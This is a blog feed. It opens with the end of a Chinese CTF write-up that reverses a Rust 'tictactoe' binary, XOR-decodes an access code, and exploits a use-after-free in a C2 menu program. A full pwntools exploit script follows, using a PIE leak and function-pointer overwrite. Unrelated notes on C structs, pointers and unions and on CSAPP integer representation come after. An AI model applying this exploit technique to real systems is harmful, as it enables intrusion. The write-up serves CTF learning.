    std::io::stdio::_print(v46);
    std::process::exit(1);
  }
  core::ptr::drop_in_place<alloc::string::String>(v42);
  core::fmt::rt::Argument::new_display(&v45, v38);
  v44 = v45;
  core::fmt::Arguments::new_v1(v43, &off_3A5098, &v44);
  std::io::stdio::_print(v43);
  tictactoe::execute_c2((int)v43, (int)&off_3A5098, v13, v14, v15, v16);
  core::ptr::drop_in_place<alloc::string::String>(v34);
  return core::ptr::drop_in_place<alloc::string::String>(v33);
}

__int64 __fastcall tictactoe::sha256_hash(int a1, int a2, int a3)
{
  int v3; // ecx
  int v4; // r8d
  int v5; // r9d
  __int64 result; // rax
  _QWORD *v8; // [rsp+10h] [rbp-178h]
  int v9[2]; // [rsp+18h] [rbp-170h]
  struct _Unwind_Exception *src; // [rsp+20h] [rbp-168h] BYREF
  int v11; // [rsp+28h] [rbp-160h]
  _BYTE v12[32]; // [rsp+90h] [rbp-F8h] BYREF
  _BYTE dest[112]; // [rsp+B0h] [rbp-D8h] BYREF
  _QWORD v14[3]; // [rsp+120h] [rbp-68h] BYREF
  _BYTE v15[48]; // [rsp+138h] [rbp-50h] BYREF
  _QWORD v16[2]; // [rsp+168h] [rbp-20h] BYREF
  _QWORD v17[2]; // [rsp+178h] [rbp-10h] BYREF

  <D as digest::digest::Digest>::new((unsigned int)&src);
  <D as digest::digest::Digest>::update((int)&src, a2, a3, v3, v4, v5, a3, a2, a1, a1, src, v11);
  memcpy(dest, &src, sizeof(dest));
  <D as digest::digest::Digest>::finalize((unsigned int)v12);
  core::fmt::rt::Argument::new_lower_hex(v17, v12);
  v16[0] = v17[0];
  v16[1] = v17[1];
  core::fmt::Arguments::new_v1(v15, &unk_7B290, v16);
  alloc::fmt::format((unsigned int)v14, (unsigned int)v15);
  result = *(_QWORD *)v9;
  *v8 = v14[0];
  v8[1] = v14[1];
  v8[2] = v14[2];
  return result;
}

之后 (<alloc::string::String as core::cmp::PartialEq<&str>>::eq(v42, &off_3A4F88) & 1) == 0 将转换结果与 271c6d20f3ba3894199fc3f58b1087130ec340bf85e290b335f8dd4a09ce802f 这串 hash 作对比，如果相同就调用 tictactoe::execute_c2.

好了，现在只要搞清楚什么样的明文加密成 sha256 后等于上述的值就好了。由于 hash 加密不可逆，有撞库的方法，不过我试了下没啥用，再次成功浪费了几分钟……

那难道我们破解不了明文了吗？别忘了我们还有 tictactoe::decrypt_key，看名字就知道和解密相关，现在全村的希望都压在这个函数上了……

_QWORD *__fastcall tictactoe::decrypt_key(_QWORD *a1)
{
  __int64 v1; // rax
  __int64 v2; // rdx
  __int64 v3; // rax
  __int64 v4; // rdx
  __int64 v5; // rax
  __int64 v6; // rdx
  int v8[6]; // [rsp+60h] [rbp-108h] BYREF
  int v9[6]; // [rsp+78h] [rbp-F0h] BYREF
  int v10[6]; // [rsp+90h] [rbp-D8h] BYREF
  _QWORD v11[3]; // [rsp+A8h] [rbp-C0h] BYREF
  _BYTE v12[48]; // [rsp+C0h] [rbp-A8h] BYREF
  _OWORD v13[3]; // [rsp+F0h] [rbp-78h] BYREF
  __int128 v14; // [rsp+128h] [rbp-40h] BYREF
  __int128 v15; // [rsp+138h] [rbp-30h] BYREF
  __int128 v16; // [rsp+148h] [rbp-20h] BYREF

  v1 = core::slice::<impl [T]>::iter(tictactoe::ENC_PART1);
  core::iter::traits::iterator::Iterator::map(v1, v2);
  core::iter::traits::iterator::Iterator::collect((int)v8);
  v3 = ((__int64 (__fastcall *)(void *, __int64))core::slice::<impl [T]>::iter)(&tictactoe::ENC_PART2, 7LL);
  core::iter::traits::iterator::Iterator::map(v3, v4);
  core::iter::traits::iterator::Iterator::collect((int)v9);
  v5 = core::slice::<impl [T]>::iter(tictactoe::ENC_PART3);
  core::iter::traits::iterator::Iterator::map(v5, v6);
  core::iter::traits::iterator::Iterator::collect((int)v10);
  core::fmt::rt::Argument::new_display(&v14, v8);
  core::fmt::rt::Argument::new_display(&v15, v9);
  core::fmt::rt::Argument::new_display(&v16, v10);
  v13[0] = v14;
  v13[1] = v15;
  v13[2] = v16;
  core::fmt::Arguments::new_v1(v12, &unk_7AE08, v13);
  alloc::fmt::format((unsigned int)v11, (unsigned int)v12);
  *a1 = v11[0];
  a1[1] = v11[1];
  a1[2] = v11[2];
  core::ptr::drop_in_place<alloc::string::String>(v10);
  core::ptr::drop_in_place<alloc::string::String>(v9);
  core::ptr::drop_in_place<alloc::string::String>(v8);
  return a1;
}

分析这个函数，看到它分 ENC_PART1、ENC_PART2、ENC_PART3 三部分处理。

.rodata:000000000007ADC5 ; tictactoe::ENC_PART1
.rodata:000000000007ADC5 _ZN9tictactoe9ENC_PART117hc9692e3072677d14E db 1Eh
.rodata:000000000007ADC5                                         ; DATA XREF: tictactoe::decrypt_key+11↓o
.rodata:000000000007ADC6                 db  69h ; i
.rodata:000000000007ADC7                 db  3Ch ; <
.rodata:000000000007ADC8                 db  6Bh ; k
.rodata:000000000007ADC9                 db  34h ; 4
.rodata:000000000007ADCA                 db  69h ; i
.rodata:000000000007ADCB                 db  2Eh ; .
.rodata:000000000007ADCC ; tictactoe::ENC_PART2
.rodata:000000000007ADCC _ZN9tictactoe9ENC_PART217h32e32663a27b062dE db  36h ; 6
.rodata:000000000007ADCC                                         ; DATA XREF: tictactoe::decrypt_key+52↓o
.rodata:000000000007ADCD                 db  23h ; #
.rodata:000000000007ADCE                 db  3Bh ; ;
.rodata:000000000007ADCF                 db  6Dh ; m
.rodata:000000000007ADD0                 db  6Bh ; k
.rodata:000000000007ADD1                 db  39h ; 9
.rodata:000000000007ADD2                 db  6Dh ; m
.rodata:000000000007ADD3 ; tictactoe::ENC_PART3
.rodata:000000000007ADD3 _ZN9tictactoe9ENC_PART317ha3eec3bbd5f1dfdbE db 6Eh
.rodata:000000000007ADD3                                         ; DATA XREF: tictactoe::decrypt_key:loc_12DDF1↓o
.rodata:000000000007ADD4                 db  39h ; 9
.rodata:000000000007ADD5                 db  6Dh ; m
.rodata:000000000007ADD6                 db  6Ah ; j
.rodata:000000000007ADD7                 db  69h ; i
.rodata:000000000007ADD8                 db  3Dh ; =
.rodata:000000000007ADD9                 db  3Bh ; ;
.rodata:000000000007ADDA                 db  37h ; 7
.rodata:000000000007ADDB                 db  69h ; i

分别对每一部分进行 core::iter::traits::iterator::Iterator::map 操作，然后 core::iter::traits::iterator::Iterator::collect 取操作后的结果。之后 core::fmt::rt::Argument::new_display 将这三部分分别转换为可打印值，一般用于格式化字符串。不过这里通过 v13 数组将这些值拼到一块。core::fmt::Arguments::new_v1 用于将合并后的值转换为格式化参数，用于 alloc::fmt::format。最后将结果放到 a1 数组中返回。

回想一下之前学过的一点 rust 语法，map 内部一般都会有一个闭包（函数），用于对迭代器中的每一个元素进行一些操作。看函数窗口，我们发现 tictactoe::decrypt_key::{{closure}} 函数，显然，这就是闭包了。

一共有三个，每一个都一样：

__int64 __fastcall tictactoe::decrypt_key::{{closure}}(__int64 a1, _BYTE *a2)
{
  return *a2 ^ 0x5Au;
}

闭包对每一个元素进行 ^ 0x5Au 的操作。即对三个 ENC_PART 的每一个元素都进行这样的异或。那我们只要手动提取出完整的 ENC_PART，然后对每一个 byte 都进行这样的异或，就得到了 Access Code.

终于，我们得到了 /tmp/C2_executable，但是这个程序并没有直接提供 shell 或者查看 flag 的功能，我们还得继续分析，把它 pwn 掉。好一个一波三折……

好在，生成的 C2 程序不再是 Rust 写的了……

int __fastcall __noreturn main(int argc, const char **argv, const char **envp)
{
  setvbuf(stdout, 0LL, 2, 0LL);
  for ( agent = malloc(0x10uLL); ; executeAction(agent) )
  {
    displayMenu();
    processInput();
  }
}

__int64 __fastcall executeAction(__int64 (**a1)(void))
{
  return (*a1)();
}

如上，for 循环中先 malloc 了 0x10 的大小，将得到的地址给到 agent。当一轮循环结束后就会去执行 executeAction，这个函数将传入的 agent 转换为 __int64 (**a1)(void)，即一个指向返回 __int64 的无参数函数指针的指针。调用这个函数，会将 (*a1)() 作为返回，即解引用这个二级指针，得到函数指针，并将其作为函数执行。

我们注意到函数列表中有这样一个后门函数：

unsigned __int64 getSecret()
{
  FILE *stream; // [rsp+8h] [rbp-D8h]
  char s[200]; // [rsp+10h] [rbp-D0h] BYREF
  unsigned __int64 v3; // [rsp+D8h] [rbp-8h]

  v3 = __readfsqword(0x28u);
  stream = fopen("flag.txt", "r");
  if ( stream )
  {
    fgets(s, 200, stream);
    fprintf(stdout, "%s\n", s);
    fclose(stream);
  }
  else
  {
    perror("couldn't open flag.txt");
  }
  return v3 - __readfsqword(0x28u);
}

那么思路就很清楚了，想办法让 agent 的值等于 getSecret 的地址即可。

继续看菜单选项函数：

int processInput()
{
  __int64 UserInput; // rax
  _QWORD *v1; // rbx

  __isoc99_scanf(" %c", option);
  option[0] = toupper(option[0]);
  switch ( option[0] )
  {
    case 'A':
      LODWORD(UserInput) = (_DWORD)agent;
      *agent = beginoperation;
      break;
    case 'C':
      *agent = createAccount;
      puts("===========================");
      puts("Registration Form : ");
      puts("Enter your username: ");
      v1 = agent;
      UserInput = getUserInput();
      v1[1] = UserInput;
      break;
    case 'E':
      LODWORD(UserInput) = (_DWORD)agent;
      *agent = exitProgram;
      break;
    case 'F':
      LODWORD(UserInput) = Hackupdate();
      break;
    case 'H':
      if ( agent )
      {
        LODWORD(UserInput) = (_DWORD)agent;
        *agent = printID;
      }
      else
      {
        LODWORD(UserInput) = puts("Not logged in!");
      }
      break;
    case 'K':
      LODWORD(UserInput) = (_DWORD)agent;
      *agent = Checkstatus;
      break;
    default:
      puts("Invalid option!");
      exit(1);
  }
  return UserInput;
}

每个对应选项都会将 agent 的值设置为对应选项要执行的函数的地址。

其中 E 选项会将 agent 设置为 exitProgram：

unsigned __int64 exitProgram()
{
  char v1; // [rsp+7h] [rbp-9h] BYREF
  unsigned __int64 v2; // [rsp+8h] [rbp-8h]

  v2 = __readfsqword(0x28u);
  printf("Sure you want to leave the clan (Y/N)? ");
  __isoc99_scanf(" %c", &v1);
  if ( toupper(v1) == 89 )
  {
    puts("Congrats on quitting the revolution");
    free(agent);
  }
  else
  {
    puts("Ok.");
  }
  return v2 - __readfsqword(0x28u);
}

我们看到它将 agent 释放了，这样我们下次分配同样大小空间的时候就会复用原先 agent 的地址，如果我们复用地址后还能对其进行写入，那就可以将其改成 getSecret 的地址了。

那么我们现在需要的就是找到这样一个 malloc，它将获取 0x10 的空间，我们发现 F 中的 Hackupdate 函数是：

ssize_t Hackupdate()
{
  void *buf; // [rsp+8h] [rbp-8h]

  puts("How did your previous hack go? ");
  buf = malloc(8uLL);
  return read(0, buf, 8uLL);
}

malloc 了 0x8 字节，加上 metadata 再对齐一下，和 malloc(0x10); 分配的大小应该是一样的，这样一来就成功复用了 agent 的地址，并且，紧接着它会调用 read 向这个地址写入数据。

现在我们只差临门一脚了。由于这个程序开启了 PIE 保护，所以我们得想办法泄漏程序基地址才能计算出 getSecret 的物理地址。

我们发现使用 H 选项会输出一个地址，而这个地址看上去很像程序内部的指令地址：

Command and Control Centere.
==========================
(H) Generate ID for the agent
(A) Begin a new cyber operation
(C) Create a new Agent
(K) Check status of current cyber operation
(F) Provide updates about your current hack.)
(E) Exit
> H
User ID: 0x5609404d243c

看其对应的反编译代码，调用了 generateUserID，然后通过 printf 输出返回值：

int printID()
{
  return printf("User ID: %p\n", generateUserID);
}

char *generateUserID()
{
  int v0; // eax
  unsigned int i; // [rsp+4h] [rbp-Ch]
  FILE *stream; // [rsp+8h] [rbp-8h]

  if ( !initialized_1 )
  {
    memset(userid_0, 48, sizeof(userid_0));
    stream = fopen("/dev/urandom", "rb");
    if ( stream )
    {
      for ( i = 0; i <= 0x1F; i += 2 )
      {
        v0 = fgetc(stream);
        sprintf(&userid_0[i], "%02hhx", v0);
      }
      fclose(stream);
    }
    initialized_1 = 1;
  }
  return userid_0;
}

generateUserID 会从 /dev/urandom 读取 0x10 字节数据到 userid_0 数组中，并将 userid_0 的地址作为 64-bit 指针返回。

值得注意的是，我们不关心从 /dev/urandom 里面读到的垃圾数据，generateUserID 返回的是 userid_0 在程序中的地址，而非从 /dev/urandom 里读到的值。并且 printf 使用的是 %p 格式化字符，而非 %s，所以最终打印的是 userid_0 在程序中的地址。虽然它属于 .bss 段，但是开启 PIE 会随机化整个程序的加载地址，故通过这个地址减去它和 PIE 基址之间的偏移，就得到了实际 PIE 基地址。

下面就可以愉快地编写 exploit 了。

呼呼呼，总算写完了……从早上一起来就开始分析这道题，逆向 rust 程序部分大概花了我三小时（其中有一个多小时都是在浪费时间……），逆完拿到 C2 后，一看尼玛怎么是 heap exploitation，不会啊！只觉一阵无力感瞬间袭上心头，flag 近在眼前，我明明已经解决了整个 challenge 中最困难的逆向部分，却倒在了这个看上去不怎么难的堆利用上……洗洗睡了，睡了三小时，半个下午都在无梦中度过……起来发了几句牢骚，又继续研究这个 C2。凭借着脑海中那一点点可怜的 heap exploitation 知识，试图把它突突。结果没想到起来后研究了四十分钟解决了……不算难，甚至可以说很简单……一开始以为漏洞点在 getUserInput 中，浪费了一半多的时间……

最后，这应该是我分析过的最复杂的一个程序，虽然感觉完全就是在做 forensics，pwn 的部分占比有点太小了. 当然，Yan85 VM 分析起来也不比它容易多少，不过这个 challenge 毕竟是 rust 写的，也是我第一次逆向 rust 程序。果然，rust 不用 unsafe 还是很难写出有漏洞的代码的，除非是逻辑漏洞。所以总的来说做完感觉并不是那么牛逼，反而觉得简直不要太简单，但期间还是走了不少弯路，浪费了太多时间，也是难免的……

老实说，在逆向分析的时候，我就是一路猜猜猜，凭借着直觉拿到的 C2，而不是实际的逆向分析能力。但是，实力决定下限，直觉决定上限，实力也是直觉的基础。我觉得有这样敏锐的直觉对于比赛中快速解题还是有很大帮助的，不过有时候直觉容易与事实混淆，可能导致自己掉到坑里困上好几个小时也说不准。总之，应该同时培养逆向分析的硬实力和像直觉这样的软实力，知道什么时候应该深入分析代码，什么时候应该跟着直觉走。

Exploit

#!/usr/bin/env python3

from pwn import (
    ELF,
    args,
    context,
    flat,
    process,
    raw_input,
    remote,
)

FILE = "./tictactoe"
HOST, PORT = "94.237.48.12", 35762

context(log_level="debug", binary=FILE, terminal="kitty")

elf = context.binary


def launch():
    if args.L:
        target = process(FILE)
    else:
        target = remote(HOST, PORT)
    return target


def decrypt(encrypted):
    return bytes(byte ^ 0x5A for byte in encrypted)


def main():
    target = launch()

    target.sendlineafter(b": ", b"0 0")
    target.sendlineafter(b": ", b"0 4")
    target.sendlineafter(b": ", b"1 1")
    target.sendlineafter(b": ", b"1 3")
    target.sendlineafter(b": ", b"2 2")
    target.sendlineafter(b": ", b"3 1")
    target.sendlineafter(b": ", b"3 3")
    target.sendlineafter(b": ", b"4 0")
    target.sendlineafter(b": ", b"4 4")
    target.sendlineafter(b": ", b"cub3y0nd")

    plaintext = decrypt(b"\x1ei<k4i.6#;mk9mn9mji=;7i")
    target.sendlineafter(b": ", plaintext)

    raw_input("DEBUG")
    elf = ELF("/tmp/C2_executable")

    target.sendlineafter(b"> ", b"H")
    target.recvuntil(b"ID: ")

    piebase = int(target.recvline(), 16) - 0x143C

    target.sendlineafter(b"> ", b"E")
    target.sendlineafter(b"? ", b"Y")
    target.sendlineafter(b"> ", b"F")

    payload = flat(piebase + elf.sym["getSecret"], 0)
    target.sendlineafter(b"?", payload)

    target.interactive()


if __name__ == "__main__":
    main()

The C Notebook

Thu, 17 Jul 2025 00:00:00 GMT

前言

炸炸炸，不想说话！

Pragma Once and Header Guards

Pragma Once

If the same header file gets included more than once, you can end up with some nasty errors caused by redefining things like functions or structs.

One simple solution is #pragma once. Adding this line to the top of a header file tells the compiler to include the file only once, even if it's referenced multiple times across your program.

#pragma once

struct Point {
  int x;
  int y;
  int z;
};

Header Guards

Another common way to avoid multiple inclusions is with include guards, which use preprocessor directives like this:

#ifndef MY_HEADER_H
#define MY_HEADER_H

// some cool code

#endif

Structs

Define

struct Coordinate {
  int x;
  int y;
  int z;
};

Initializers

Say we have a struct defined like this:

struct City {
  char *name;
  int lon;
  int lat;
};

There are a few different ways to initialize a struct.

Zero Initializer

struct City c = {0};

Positonal Initializer

struct City c = {"San Francisco", -122, 37};

Designated Initializer

struct City c = {
  .name = "San Francisco",
  .lon = -122,
  .lat = 37
};

Accessing Fields

struct City c;

c.lat = 41;

printf("Latitude: %d\n", c.lat);

Typedef

If you give a name to the struct while using typedef, you'd have 2 ways refer to this type:

typedef struct Coordinate {
  int x;
  int y;
  int z;
} cood_t;

struct Coordinate way_1;
coord_t way_2;

We can optionally skip giving the struct a name:

typedef struct {
  int x;
  int y;
  int z;
} coord_t;

coord_t coord;

In this case, you'd only be able to refer the type as coord_t.

Sizeof Struct

Structs are stored contiguously in memory one field after another. Take this struct:

typedef struct {
  int x;
  int y;
  int z;
} coord_t;

Assuming int is 4 bytes, the total size of coord_t would be 12 bytes.

typedef struct {
  char first_initial;
  int age;
  double height;
} human_t;

Assuming char is 1 byte, int is 4 bytes, and double is 8 bytes, the total size of human_t would be 16 bytes.

Each member of a struct must be aligned to its own alignment requirement
The overall size of a struct must be a multiple of the largest alignment requirement among its members
$padding=( alignment-( address\ %\ alignment)) \ %\ alignment$

:::tip As a rule of thumb, ordering your fields from largest to smallest will help the compiler minimize padding. :::

For example:

typedef struct {
  char a;
  double b;
  char c;
  char d;
  long e;
  char f;
} poorly_aligned_t;

typedef struct {
  double b;
  long e;
  char a;
  char c;
  char d;
  char f;
} better_t;

poorly_aligned_t will insert 20 paddings, total size would be 40 bytes. But better_t only add 4 paddings, its size would be 24 bytes only.

Pointers

A pointer is declared with an asterisk (*) after the type. For example, int *.

To get the address of a variable so that we can store it in a pointer variable, we can use the address-of operator (&).

int age = 28;
int *p_int = &age;

Oftentimes we have a pointer, but we want to get access to the data that it points to. Not the address itself, but the value stored at that address.

We can use an asterisk (*) to do it. The * operator dereferences a pointer.

int meaning_of_life = 42;
int *pointer_to_mol = &meaning_of_life;
int value_at_pointer = *pointer_to_mol;
// value_at_pointer = 42

It can be a touch confusing, but remember that the asterisk symbol is used for two different things:

Declaring a pointer type: int *pointer_to_thing;
Dereferencing a pointer value: int value = *pointer_to_thing; (retrieving the value) or *pointer_to_thing = 20; (modifying the value)

Important things related to structs

In C, structs are passed-by-value. Updating a field in the struct does not change the original struct
To get the change to "persist", we can return the updated struct from the function (a new copy) or just pass struct's pointer, and dereference the pointer to modify the original struct

As you know, when you have a struct, you can access the fields with the dot (.) operator:

coord_t point = {10, 20, 30};

printf("X: %d\n", point.x);

However, when you're working with a pointer to a struct, you need to use the arrow (->) operator:

coord_t point = {10, 20, 30};
coord_t *ptrToPoint = &point;

printf("X: %d\n", ptrToPoint->x);

It effectively dereferences the pointer and accesses the field in one step. To be fair, you can also use the dereference and dot operator (* and .) to achieve the same result (it's just more verbose and less common):

coord_t point = {10, 20, 30};
coord_t *ptrToPoint = &point;

printf("X: %d\n", (*ptrToPoint).x);

Order of Operations

The . operator has a higher precedence than the * operator, so parentheses are necessary when using * to dereference a pointer before accessing a member... which is another reason why the arrow operator is so much more common.

Void Pointers

A void * "void pointer" tells the compiler that this pointer could point to anything. This is why void pointers are also known as a "generic pointer".

Since void pointers do not have a specific data type, they cannot be directly dereferenced or used in pointer arithmetic without casting them to another pointer type first.

int number = 42;
void *generic_ptr = &number;

// This doesn't work
printf("Value of number: %d\n", *generic_ptr);

// This works: Cast to appropriate type before dereferencing
printf("Value of number: %d\n", *(int *)generic_ptr);

A common pattern is to store generic data in one variable, and the type of that data in another variable. This is useful when you need to pass data around without knowing its type at compile time.

typedef enum DATA_TYPE {
  INT,
  FLOAT
} data_type_t;

void printValue(void *ptr, data_type_t type) {
  if (type == INT) {
    printf("Value: %d\n", *(int *)ptr);
  } else if (type == FLOAT) {
    printf("Value: %f\n", *(float *)ptr);
  }
}

int number = 42;
printValue(&number, INT);

float decimal = 3.14;
printValue(&decimal, FLOAT);

Arrays

Declaration

int numbers[5] = {1, 2, 3, 4, 5};

Array as Pointer

int *way_1 = numbers;
int *way_2 = &numbers[0];

Accessing Elements via Indexing

// Access the third element (index 2)
int way_1 = numbers[2];
int way_2 = *(numbers + 2);

Array Casting

#include <stdio.h>

typedef struct {
  int x;
  int y;
  int z;
} coord_t;

int main() {
  coord_t arr[3] = {{1, 2, 3}, {4, 5, 6}, {7, 8, 9}};

  for (int i = 0; i < 3; i++) {
    for (int j = 0; j < 3; j++) {
      printf("%d\n", *(int *)&arr[i] + j);
    }
  }

  return 0;
}

Because arrays are basically just pointers, and we know that structs are contiguous in memory, we can cast the array of structs to an array of integers:

#include <stdio.h>

typedef struct {
  int x;
  int y;
  int z;
} coord_t;

int main() {
  coord_t arr[3] = {{1, 2, 3}, {4, 5, 6}, {7, 8, 9}};
  int *ptr = (int *)arr;

  for (int i = 0; i < 9; i++) {
    printf("%d\n", ptr[i]);
    // printf("%d\n", *(int *)&arr + i);
  }

  return 0;
}

Array Decay to Pointers

So we know that arrays are like pointers, but they're not exactly the same. Arrays allocate memory for all their elements, whereas pointers just hold the address of a memory location. In many contexts, arrays decay to pointers, meaning the array name becomes "just" a pointer to the first element of the array.

When Arrays Decay

Arrays decay when used in expressions containing pointers:

int arr[5];
int *ptr = arr;          // 'arr' decays to 'int *'
int value = *(arr + 2);  // 'arr' decays to 'int *'

And also when they're passed to functions... so they actually decay quite often in practice. That's why you can't pass an array to a function by value like you do with a struct; instead, the array name decays to a pointer.

When Arrays Don't Decay

sizeof Operator: Returns the size of the entire array (e.g., sizeof(arr)), not just the size of a pointer
& Operator: Taking the address of an array with &arr gives you a pointer to the whole array, not just the first element. The type of &arr is a pointer to the array type, e.g., int (*)[5] for an int array with 5 elements
Initialization: When an array is declared and initialized, it is fully allocated in memory and does not decay to a pointer

Enumerations

You can define a new enum type like this:

typedef enum DaysOfWeek {
  MONDAY,
  TUESDAY,
  WEDNESDAY,
  THURSDAY,
  FRIDAY,
  SATURDAY,
  SUNDAY,
} days_of_week_t;

The typedef and its alias days_of_week_t are optional, but like with structs, they make the enum easier to use.

In the example above, days_of_week_t is a new type that can only have one of the values defined in the enum:

MONDAY, which is 0
TUESDAY, which is 1
WEDNESDAY, which is 2
THURSDAY, which is 3
FRIDAY, which is 4
SATURDAY, which is 5
SUNDAY, which is 6

An enum is not a collection type like a struct or an array. It's just a list of integers constrained to a new type, where each is given an explicit name.

You can use the enum type like this:

typedef struct Event {
  char *title;
  days_of_week_t day;
} event_t;

typedef struct Event {
  char *title;
  enum DaysOfWeek day;
} event_t;

Non-Default Values

Sometimes, you want to set those enumerations to specific values. For example, you might want to define a program's exit status codes:

typedef enum {
  EXIT_SUCCESS = 0,
  EXIT_FAILURE = 1,
  EXIT_COMMAND_NOT_FOUND = 127,
} ExitStatus;

Alternatively, you can define the first value and let the compiler fill in the rest (incrementing by 1):

typedef enum {
  LANE_WPM = 200,
  PRIME_WPM, // 201
  CUBEY_WPM,  // 202
} WordsPerMinute;

Switch Case

One of the best features of enums is that it can be used in switch statements.

Avoid "magic numbers"
Use descriptive names
With modern tooling, will give you an error/warning that you haven't handled all the cases in your switch

switch (logLevel) {
case LOG_DEBUG:
  printf("Debug logging enabled\n");
  break;
case LOG_INFO:
  printf("Info logging enabled\n");
  break;
case LOG_WARN:
  printf("Warning logging enabled\n");
  break;
case LOG_ERROR:
  printf("Error logging enabled\n");
  break;
default:
  printf("Unknown log level: %d\n", logLevel);
  break;
}

You'll notice that we have a break after each case. If you do not have a break (or return), the next case will still execute: it "falls through" to the next case.

In some rare cases, you might want the fallthrough:

switch (errorCode) {
case 1:
case 2:
case 3:
  printf("Minor error occurred. Please try again.\n");
  break;
case 4:
case 5:
  printf("Major error occurred. Restart required.\n");
  break;
default:
  printf("Unknown error.\n");
  break;
}

Sizeof Enum

Generally, enums in C are the same size as an int. However, if an enum value exceeds the range of an int, the C compiler will use a larger integer type to accommodate the value, such as an unsigned int or a long.

Union

union is just a combination of the two concepts with struct and enum.

typedef union AgeOrName {
  int age;
  char *name;
} age_or_name_t;

The age_or_name_t type can hold either an int or a char *, but not both at the same time (that would be a struct). We provide the list of possible types so that the C compiler knows the maximum potential memory requirement, and can account for that. This is how the union is used:

age_or_name_t lane = { .age = 29 };
printf("age: %d\n", lane.age);
// age: 29

Here's where it gets interesting. What happens if we try to access the name field (even though we set the age field)?

printf("name: %s\n", lane.name);

A union only reserves enough space to hold the largest type in the union and then all of the fields use the same memory.

Then if we try to access .name, we read from the same block of memory but try to interpret the bytes as a char *, which is undefined behavior. Put simply, setting the value of .age overwrites the value of .name and vice versa, and you should only access the field that you set.

Memory Layout

Unions store their value in the same memory location, no matter which field or type is actively being used. That means that accessing any field apart from the one you set is generally a bad idea.

Union Size

A downside of unions is that the size of the union is the size of the largest field in the union. Take this example:

typedef union IntOrErrMessage {
  int data;
  char err[256];
} int_or_err_message_t;

The int_or_err_message_t union will take 256 bytes whether it use err or not.

Helper Fields

One interesting (albeit not commonly used) trick is to use unions to create "helpers" for accessing different parts of a piece of memory. Consider the following:

typedef union Color {
  struct {
    uint8_t r;
    uint8_t g;
    uint8_t b;
    uint8_t a;
  } components;
  uint32_t rgba;
} color_t;

Only 4 bytes are used. And, unlike in 99% of scenarios, it makes sense to both set and get values from this union through both the components and rgba fields! Both fields in the union are exactly 32 bits in size, which means that we can "safely" (?) access the entire set of colors through the .rgba field, or get a single color component through the .components field.

The convenience of additional fields, with the efficiency of a single memory location!

Memory-Related Perils and Pitfalls

Dereferencing bad pointers
Reading uninitialized memory
Overwriting memory
Referencing nonexistent variables
Freeing blocks multiple times
Referencing freed blocks
Failing to free blocks

Operators Precedence

Operators	Associativity
`()`, `[]`, `->`, `.`	left to right
`!`, `~`, `++`, `--`, `+`, `-`, `*`, `&`, `(type)`, `sizeof`	right to left
`*` `/`, `%`	left to right
`+`, `-`	left to right
`<<`, `>>`	left to right
`<`, `<=`, `>`, `>=`	left to right
`==`, `!=`	left to right
`&`	left to right
`^`	left to right
`\|`	left to right
`&&`	left to right
`\|\|`	left to right
`?:`	right to left
`=`, `+=`, `-=`, `*=`, `/=`, `%=`, `&=`, `^=`, `\|=`, `<<=`, `>>=`	right to left
`,`	left to right

:::important Unary +, -, and * have higher precedence than binary forms. :::

Pointer Declarations Quiz

int *p: p is a pointer to int
int *p[13]: p is an array[13] of pointer to int
int *(p[13]): p is an array[13] of pointer to int
int **p: p is a pointer to a pointer to an int
int (*p)[13]: p is a pointer to an array[13] of int
int *f(): f is a function returning a pointer to int
int (*f)(): f is a pointer to a function returning int
int (*(*f())[13])(): f is a function returning pointer to an array[13] of pointers to functions returning int
int (*(*x[3])())[5]: x is an array[3] of pointers to functions returning pointers to array[5] of ints

The CSAPP Notebook

Wed, 16 Jul 2025 00:00:00 GMT

前言

不开心，不想说话……让我们直接进入这段有趣的学习之旅吧，试试两个月，甚至更短的时间内解决掉这门又臭又长的课程。

Bits, Bytes, and Integers

Representation information as bits

Everything is bits

Each bit is 0 or 1

By encoding/interpreting sets of bits in various ways

Computers determine what to do (instructions)
... and represent and manipulate numbers, sets, strings, etc...

Why bits ? Electronic Implementation

Easy to store with bitsable elements
Reliably transmitted on noisy and inaccurate wires
Easy to indicate low level/high level

Bit-level manipulations

Representing & Manipulating Sets

Representing Sets

We can use bits to determine whether an element belongs to a set. Say each bit have index, which corresponds to a number from zero. If a bit is set to 1, it means the corresponding index (i.e., the element) is in the set. Otherwise, its not.

In a more mathematical representation way:

Width $w$ bit vector represents subsets subsets of ${0,\ ...,\ w-1}$
$a_{j} =1$ if $j\in A$

Sets Operations

& is related to Intersection
| is related to Union
~ is related to Complement
^ is related to Symmetric difference

Shift Operations

Left Shift: `x << y`

Shift bit-vector x left y positions
- Throw away extra bits on left
Fill with 0's on right

Right Shift: `x >> y`

Shift bit-vector x right y positions
- Throw away extra bits on right
Logical shift
- Fill with 0's on left
Arithmetic shift
- Replicate most significant bit on left

Undefined Behaviour

Shift amount $< $ 0
Shift amount $\geqslant $ word size
Left shift a signed value

Integers

Representation: unsigned and signed

Unsigned

$$\displaystyle B2U( X) =\sum {i=0}^{w-1} x{i} \cdot 2^{i}$$

Two's Complement

$$\displaystyle B2T( X) =-x_{w-1} \cdot 2^{w-1} +\sum {i=0}^{w-2} x{i} \cdot 2^{i}$$

Invert mappings

$U2B( x) =B2U^{-1}( x)$
$T2B( x) =B2T^{-1}( x)$

Numeric Ranges

Unsigned Values
- $\displaystyle UMin\ =\ 0$
- $\displaystyle UMax\ =\ 2^{w} -1$
Two's Complement Values
- $\displaystyle TMin = -2^{w-1}$
- $\displaystyle TMax\ =\ 2^{w-1} -1$

:::tip In C, these ranges are declared in limits.h. E.g., ULONG_MAX, LONG_MAX, LONG_MIN. Values are platform specific. :::

Observations

$|TMin|=TMax+1$
- Asymmetric range (Every positive value can be represented as a negative value, but $TMin$ cannot be represented as a positive value)
$UMax\ =\ 2\cdot TMax+1$

Difference between Unsigned & Signed Numeric Values

The difference between Unsigned & Signed Numeric Values is $2^{w}$.

For example, if you want convert a unsigned numeric value to its signed form, just use this value minus $2^{w}$, or if you want convert a signed numeric value to its unsigned form, you plus $2^{w}$.

Conversion, casting

Mappings between unsigned and two's complement numbers keep bit representations and reinterpret.

For example, casting a signed value to its unsigned form, the most significant bit from large negative weight becomes to large positive weight and vice versa.

Constants

By default are considered to be signed integers
Unsigned if have "U" as suffix

Casting

Explicit casting between signed & unsigned same as $U2T$ and $T2U$
Implicit casting also occurs via assignments and procedure call (assignments will casting to lhs's type)

Expression Evaluation

If there is a mix of unsigned and signed in single expression, signed values implicitly cast to unsigned
Including comparison operations <, >, ==, <=, >

Constants 1	Constants 2	Relation	Evaluation
`0`	`0U`	==	unsigned
`-1`	`0`	<	signed
`-1`	`0U`	>	unsigned
